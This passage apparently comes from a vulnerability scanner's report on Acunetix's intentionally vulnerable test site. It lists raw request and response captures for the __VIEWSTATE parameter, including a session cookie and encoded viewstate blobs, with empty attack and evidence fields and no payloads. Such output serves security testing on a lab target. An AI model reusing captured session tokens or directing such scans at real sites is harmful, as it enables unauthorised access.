href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8448&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBApOl5ENsIZGRka321dk2K15oHaNAGoW%2Ff65nHWKM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLqyP6VBALQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBXvGED63t3WymbopnG4E4wrMgRbM
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:33 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBApOl5ENsIZGRka321dk2K15oHaNAGoW/f65nHWKM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLqyP6VBALQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBXvGED63t3WymbopnG4E4wrMgRbM" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:White" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8436&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBAr%2BwLB9sIZGRkvFqfd4Zxhsbx%2FDXOmE9R%2FmTcDIk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKn6IcXAtCnkuUEAtOn6sAIAo33qKkGAo33qKkGAuadu94JAuadu94JAuadr%2FUCAuadr%2FUCAuadw4kKAuadw4kKAuad96wDAuad96wDAuad68MMAuad68MMAuadn%2BYFAuadn%2BYFAuads70NAuads70NAuadp9AGAuadp9AGAuadm7kDAuadm7kDAuadj9wMAuadj9wMAvukmcUPAvukmcUPAvukjZgHAvukjZgHAvukoT8C%2B6ShPwL7pNXTCQL7pNXTCQL7pMn2AgL7pMn2AgL7pP2NCgL7pP2NCgL7pJGgAwL7pJGgAwL7pIXHDAL7pIXHDAL7pPmsCQL7pPmsCQL7pO3DAgL7pO3DAgLcy%2F%2FoBQLcy%2F%2FoBQLcy5OPDQLcy5OPDQLcy4eiBgLcy4eiBgLcy7v5DwLcy7v5DwLcy6%2BcBwLcy6%2BcBwLcy8MwAtzLwzAC3Mv31wkC3Mv31wkC3Mvr6gIC3Mvr6gIC3Mvf0w8C3Mvf0w8C3Mvz9ggC3Mvz9ggCsdLdnwoCsdLdnwoCsdLxsgMCsdLxsgMCsdLlyQwCsdLlyQwCsdKZ7AUCsdKZ7AUCsdKNgw0CsdKNgw0CsdKhpgYCsdKhpgYCsdLV%2Bg8CsdLV%2Bg8CsdLJkQcCsdLJkQcCsdK9%2BQUCsdK9%2BQUCsdLRnQ0CsdLRnQ0CivmjBQKK%2BaMF9dW8cZAoyj%2Ff1%2BnuqvTyfJ37FhA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:38 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgBAr+wLB9sIZGRkvFqfd4Zxhsbx/DXOmE9R/mTcDIk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKn6IcXAtCnkuUEAtOn6sAIAo33qKkGAo33qKkGAuadu94JAuadu94JAuadr/UCAuadr/UCAuadw4kKAuadw4kKAuad96wDAuad96wDAuad68MMAuad68MMAuadn+YFAuadn+YFAuads70NAuads70NAuadp9AGAuadp9AGAuadm7kDAuadm7kDAuadj9wMAuadj9wMAvukmcUPAvukmcUPAvukjZgHAvukjZgHAvukoT8C+6ShPwL7pNXTCQL7pNXTCQL7pMn2AgL7pMn2AgL7pP2NCgL7pP2NCgL7pJGgAwL7pJGgAwL7pIXHDAL7pIXHDAL7pPmsCQL7pPmsCQL7pO3DAgL7pO3DAgLcy//oBQLcy//oBQLcy5OPDQLcy5OPDQLcy4eiBgLcy4eiBgLcy7v5DwLcy7v5DwLcy6+cBwLcy6+cBwLcy8MwAtzLwzAC3Mv31wkC3Mv31wkC3Mvr6gIC3Mvr6gIC3Mvf0w8C3Mvf0w8C3Mvz9ggC3Mvz9ggCsdLdnwoCsdLdnwoCsdLxsgMCsdLxsgMCsdLlyQwCsdLlyQwCsdKZ7AUCsdKZ7AUCsdKNgw0CsdKNgw0CsdKhpgYCsdKhpgYCsdLV+g8CsdLV+g8CsdLJkQcCsdLJkQcCsdK9+QUCsdK9+QUCsdLRnQ0CsdLRnQ0CivmjBQKK+aMF9dW8cZAoyj/f1+nuqvTyfJ37FhA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:White" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td 